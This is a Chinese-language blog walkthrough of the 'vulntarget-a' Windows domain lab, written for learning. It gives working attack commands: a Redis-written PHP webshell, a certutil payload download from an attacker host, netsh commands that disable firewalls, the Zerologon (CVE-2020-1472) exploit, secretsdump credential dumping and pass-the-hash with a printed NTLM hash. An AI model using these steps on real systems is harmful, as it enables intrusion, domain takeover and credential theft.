freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

vulntarget-a
热烈的马 2022-08-20 15:28:30 189861
所属地 辽宁省

前言:

每个人都有属于自己的一片森林,也许我们从来不曾去过,但它一直在那里,总会在那里,迷失的人迷失了,相逢的人会再相逢,即使是你最心爱的人,心中都有一片你无法到达的森林。

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

靶场的拓补图如上,只有三台windows的机器,还是相对比较的简答,主要考察隧道与免杀的能力

一、信息收集

访问外网web

http://192.168.36.128/

1656571372_62bd45ec205ec37d197d9.png!small?1656571371675

通达OA,直接上工具一把梭

1656571433_62bd4629cb8d1da3ba307.png!small?1656571432408

通过蚁剑连接发现其全新为system

1656571486_62bd465e2af01bb2147ca.png!small?1656571484783

查看ip配置,为双网卡主机

查看是否有杀软 tasklist /svc

1656571834_62bd47ba696f7282b6b32.png!small?1656571833353

没有杀软就容易很多了,先生成一个木马,使其反弹到msf上

msf设置监听,同时蚁剑启动exe,即可

1656571727_62bd474f6768150f6dd9c.png!small?1656571726449

这里可以将win7的防火墙给关闭掉,让后面更容易操作

关闭防火墙:netsh firewall set opmode mode=disable
关闭防火墙:netsh advfirewall set allprofiles state off
查看防火墙状态:netsh advfirewall show allprofiles

二、横向移动

查看是否存在域环境

1656572232_62bd4948bb3b601ab5647.png!small?1656572231799

这台机器不在域环境中,或者不存在域,返回shell查看网段

有一个10.0.20.0/24的网段,因此添加路由,并且做主机发现有一台99的机器

run autoroute -s 10.0.20.0/24

使用msf自带的socks隧道代理,对其做端口的扫描发现,也可以用msf自带的模块进行探测,笔者这里使用

scanner/portscan/tcp模块对其进行探测

1656572961_62bd4c2177b1c57baf2df.png!small?1656572960312

80端口和6379端口,配置socks隧道,代理火狐对其进行访问(隧道有很多种,笔者这里用的msf自带的隧道,因为感觉msf的比较方便)

使用server/socks_proxy这个模块配置即可

火狐配置代理

1656573085_62bd4c9d74cdfb1d0b1df.png!small?1656573084114

初步探测为phpstudy搭建,切版本为5.4.45

1656573132_62bd4cccd4cb9fabb8326.png!small?1656573131471

尝试利用phpstudy的后门漏洞但是失败了,对其进行目录的扫描探测也没有发现什么有价值的东西,

只发现一个phpinfo

尝试利用6379端口,尝试登录

1656573432_62bd4df83c51bbf9f29eb.png!small?1656573430947

可以匿名登录,尝试写入webshell,路径可以从上面的phpinfo中获取到

config set dir C:/phpStudy/PHPTutorial/WWW

config set dbfilename 16.php
set x "\n\n\n<?php @system($_GET[1]);?>\n\n\n"

1656575406_62bd55aeba47e6a237c54.png!small?1656575405270

可以执行命令但是发现效果不是特别好

查询是否有杀软

1656575522_62bd562239d6de5f3be0c.png!small?1656575520952

那也可以先直接生成木马,上线到msf

将生成的木马上传到win7中,因为win7有web服务,因此利用命令直接下载即可

certutil -urlcache -split -f http://10.0.20.98/16.exe

1656575860_62bd57747c3ae8cb79312.png!small?1656575859000

但是发现文件夹中并没有文件,上传其他文件倒是存在,这里猜测被杀软给查杀了,但是上面探测又无杀软

先关闭其防火墙

netsh advfirewall set allprofiles state of1656576095_62bd585fd2c9b3270951d.png!small?1656576094393


那就利用免杀的木马进行传递,免杀在这就不在阐述了,msf监听即可

同样查看一下路由,并且对其进行添加

存在域环境

定位域控ip

利用nbtscan.exe探测一下是否还有其他主机

nbtscan.exe 10.0.10.0/24

只有一台域控,那简单多了,返回shell抓取hash

三、域控提权

尝试了CVE-2021-42287, CVE-2021-42278但是失败了,于是尝试CVE-2020-1472

查看域控主机名

net group "domain controllers" /domain

域控主机名为win2019

利用exp探测漏洞是否存在

proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110

利用脚本攻击,将其密码置空

proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110

1656585747_62bd7e138a7d3c3377c81.png!small?1656585746153


导出凭据

proxychains4 python3 secretsdump.py vulntarget.com/win2019\$@10.0.10.110 -no-pass

1656586127_62bd7f8f77ad519530e46.png!small?1656586126779


得到域控的ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::


利用wmiexec.py进行hash传递即可


proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 vulntarget.com/

即拿下域控,后续还需要将域控的密码还原,这里就不在阐述了。

想要上线msf只需要将生成的木马上次到win2016(16有web服务),然后在域控机器对其进行下载即可,不过需要注意免杀,域控机器有windows defener。

# 靶场实战 # 靶场攻关
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 热烈的马 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
内网靶场
热烈的马 LV.6
这家伙太懒了,还未填写个人描述!
  • 45 文章数
  • 18 关注者
关于Windows中获取指定进程pid的几种方法
2023-08-04
利用NtDuplicateObject进行Dump
2023-04-05
NTLM中继
2023-03-31
文章目录